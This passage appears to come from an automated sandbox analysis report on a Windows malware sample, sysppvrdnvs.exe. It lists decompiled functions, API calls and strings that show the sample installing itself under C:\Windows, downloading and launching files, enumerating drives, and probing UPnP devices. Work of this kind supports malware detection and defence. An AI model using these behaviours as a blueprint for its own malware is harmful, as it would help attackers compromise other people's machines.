                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3862671961-0
                                                                                                                                                                                              • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                              • Instruction ID: 15ec6ce41066bd2df298828df26a4308ea05a03792f046612c1f6ffbd780898a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B412C74E00209DBDB04DFE4D844BAEBB71FF54315F108169E916AB381D7789A84CF99

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 400 40f400-40f460 memset * 2 CreateProcessW 401 40f471-40f495 ShellExecuteW 400->401 402 40f462-40f46f Sleep 400->402 404 40f4a6 401->404 405 40f497-40f4a4 Sleep 401->405 403 40f4a8-40f4ab 402->403 404->403 405->403
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.NTDLL ref: 0040F40E
                                                                                                                                                                                              • memset.NTDLL ref: 0040F41E
                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,00407D11,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040F457
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F467
                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00407D11,00000000,00000000,00000000), ref: 0040F482
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F49C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                                                                              • String ID: $D$open
                                                                                                                                                                                              • API String ID: 3787208655-2182757814
                                                                                                                                                                                              • Opcode ID: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                                                                              • Instruction ID: 03d024a0b9a73c413bf1553ab10d0ee3a8ab15297eec0ef6a9417e1ec1830951
                                                                                                                                                                                              • Opcode Fuzzy Hash: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                                                                              • Instruction Fuzzy Hash: ED112B71A80308BAEB209B90CD46FDE7778AB14B10F204135FA047E2C0D6B9AA448759

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 406 40b530-40b53d 407 40b544-40b562 call 40a950 406->407 408 40b53f 406->408 409 40b61c-40b61f 407->409 412 40b568-40b56f 407->412 408->409 413 40b57a-40b583 412->413 414 40b5b4-40b5d5 CreateFileW 413->414 415 40b585-40b5b2 413->415 417 40b603-40b619 InterlockedExchange call 40ab60 414->417 418 40b5d7-40b5fc WriteFile FlushFileBuffers 414->418 415->413 417->409 418->417
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B5C8
                                                                                                                                                                                              • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B5E9
                                                                                                                                                                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B5F3
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040B5FD
                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00414FB0,0000003D), ref: 0040B60A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                                                                              • String ID: C:\Users\user\tbtnds.dat$.#v
                                                                                                                                                                                              • API String ID: 442028454-2305399225
                                                                                                                                                                                              • Opcode ID: e97a8a2c87699ed7addb569746da41be2ee15c664e58c9574dad2c17ef3edcb8
                                                                                                                                                                                              • Instruction ID: a0ca425d267a8141d5e1d1f6c90da30668f0d4feb664184cc2dbb6b4fe126232
                                                                                                                                                                                              • Opcode Fuzzy Hash: e97a8a2c87699ed7addb569746da41be2ee15c664e58c9574dad2c17ef3edcb8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 93312BB4A00208EBCB14DF94DC45FAEB775FB88304F208969E51567390D775AA41CF99

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 421 40e310-40e32a 422 40e33b-40e342 421->422 423 40e3f4-40e3fd 422->423 424 40e348-40e367 recvfrom 422->424 425 40e376-40e393 StrCmpNIA 424->425 426 40e369-40e374 Sleep 424->426 428 40e395-40e3b4 StrStrIA 425->428 429 40e3ef 425->429 427 40e32c-40e335 426->427 427->422 428->429 430 40e3b6-40e3ed StrChrA call 40d320 428->430 429->427 430->429
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                                                                              • StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleeprecvfrom
                                                                                                                                                                                              • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                                                                              • API String ID: 668330359-3973262388
                                                                                                                                                                                              • Opcode ID: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                                                                              • Instruction ID: e67ba9521a541be798431772fb319970cc3d6429c6b3b7a9c3ce28b53cac335a
                                                                                                                                                                                              • Opcode Fuzzy Hash: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E2130B0940218ABDB20CB65DC45BE9BB74AB04308F1085E9EB19B72C0D7B95AD6CF5D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040F4C7
                                                                                                                                                                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F4E6
                                                                                                                                                                                              • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F50F
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F538
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F542
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F54D
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F4C2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                                                                              • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                              • API String ID: 2743515581-2960703779
                                                                                                                                                                                              • Opcode ID: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                                                                              • Instruction ID: af5d65e8d2fa993cc87ce820da5284d466d7432e490674ab1d3698c460306143
                                                                                                                                                                                              • Opcode Fuzzy Hash: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                                                                              • Instruction Fuzzy Hash: E7212975A40308BBDB20DF94CC49FEEB7B5AB04705F1084A5EA11AB2C0C7B9AA84CB55
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                                                                                              • String ID: %s%s
                                                                                                                                                                                              • API String ID: 1447977647-3252725368
                                                                                                                                                                                              • Opcode ID: 2d324eb47764d7037ea5e491b70087558066b5eaf200536a1985154444fa6cc2
                                                                                                                                                                                              • Instruction ID: a96cc5071c69656b1b6f4b00c6699880e4d6530ea1aa1078cf67c052952084b8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d324eb47764d7037ea5e491b70087558066b5eaf200536a1985154444fa6cc2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 643116B0C01218DFCB50DFA8DC887EDBBB4BB48304F1085AAE609B6290D7795AC4CF59
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406427
                                                                                                                                                                                              • NoDrives, xrefs: 00406458
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                                                                              • API String ID: 2666887985-3471754645
                                                                                                                                                                                              • Opcode ID: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                                                                              • Instruction ID: 87cba227ccd7b938b07588cb79f30f32aa16a0fd6c84a7572e83495dfcaef010
                                                                                                                                                                                              • Opcode Fuzzy Hash: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                                                                              • Instruction Fuzzy Hash: D311FCB0E0020A9BDB10CFD0D945BEEBBB4BB08304F118119E615B7280D7B85685CF99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                                                                                • Part of subcall function 0040DCD0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                                                                                • Part of subcall function 0040DCD0: CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                                                                              • DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2251373460-0
                                                                                                                                                                                              • Opcode ID: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                                                                              • Instruction ID: 271f69a92097b1b74c70525479ef463fb32d1143369d808ec26f6a45d53993ac
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D31FA74A00208EFDB04DF98D889B9E7BB5EF48314F0085A8E906A7391D774EA95CF94
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                                                                                              • htons.WS2_32(?), ref: 00401281
                                                                                                                                                                                              • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                                                                              • String ID: pdu
                                                                                                                                                                                              • API String ID: 2164660128-2320407122
                                                                                                                                                                                              • Opcode ID: 7007df3cd78c05f6c364500769b3b78794ef507e39daca42a47d869b9814613d
                                                                                                                                                                                              • Instruction ID: 05dd75d8116292c76d11c3cc90d45d23dbf78b8bb9632d9a28891a4d74dcab7a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7007df3cd78c05f6c364500769b3b78794ef507e39daca42a47d869b9814613d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0731B3762083009BC710DF69D880A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
                                                                                                                                                                                              • QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
                                                                                                                                                                                              • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DeviceDriveQueryType
                                                                                                                                                                                              • String ID: ?c@$\??\
                                                                                                                                                                                              • API String ID: 1681518211-744975932
                                                                                                                                                                                              • Opcode ID: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                                                                              • Instruction ID: e6efffa98ab35b62633249d18dd791fc9affcc5f03e1fdb0b50d0aac4f7d71b0
                                                                                                                                                                                              • Opcode Fuzzy Hash: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6101F474A4021CEBCB20CF55DD497DD7774AB04714F00C0BAAA06A7280D6759FD5CF99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002,?,?,004083D7), ref: 00407398
                                                                                                                                                                                              • SysAllocString.OLEAUT32(C:\Windows\sysppvrdnvs.exe), ref: 004073A3
                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 004073C8
                                                                                                                                                                                                • Part of subcall function 004073E0: SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004073C2
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • C:\Windows\sysppvrdnvs.exe, xrefs: 0040739E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                                                                              • String ID: C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                              • API String ID: 459949847-2879333202
                                                                                                                                                                                              • Opcode ID: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                                                                              • Instruction ID: 94d3ecd3e534f0c2973a063d63be5db40503c7f445082467247c405133df6831
                                                                                                                                                                                              • Opcode Fuzzy Hash: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                                                                              • Instruction Fuzzy Hash: FEE01275944208FBD7049FA0ED0EB9D77649B04341F1041A5FD05A22A1DAF56E80D755
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                                                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 1378416451-507759092
                                                                                                                                                                                              • Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                              • Instruction ID: 7e163f13d574deee43add6bab66e88a36a5285de070472799180e575aa2043d7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                              • Instruction Fuzzy Hash: A0F03774A40308FBDB20DFA4DC49FCD7B74EB04701F2082A4FA047B2D0D6B55A418B44
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                                                                                              • recvfrom.WS2_32 ref: 0040119C
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3980219359-0
                                                                                                                                                                                              • Opcode ID: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                                                                              • Instruction ID: daf299aa3b87b71fb70ff151311bbfa052327c8c190f043936f27822c7d74034
                                                                                                                                                                                              • Opcode Fuzzy Hash: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1621C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF559A6290E774D94887EA
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00407670: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateFreeInstanceString
                                                                                                                                                                                              • String ID: Microsoft Corporation
                                                                                                                                                                                              • API String ID: 586785272-3838278685
                                                                                                                                                                                              • Opcode ID: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
                                                                                                                                                                                              • Instruction ID: e42f15a5a8f3a5930d9f1f6311551bcb6c6e46ad7cdc057207f56e8781896ff9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5191FB75E0450AAFCB14DB98CC94EAFB7B5BF48300F208169E505B73A0D735AE42CB66
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002,?,?,?,004083D2), ref: 0040E0CA
                                                                                                                                                                                                • Part of subcall function 0040E190: socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                                                                                • Part of subcall function 0040E190: htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                                                                                • Part of subcall function 0040E190: inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
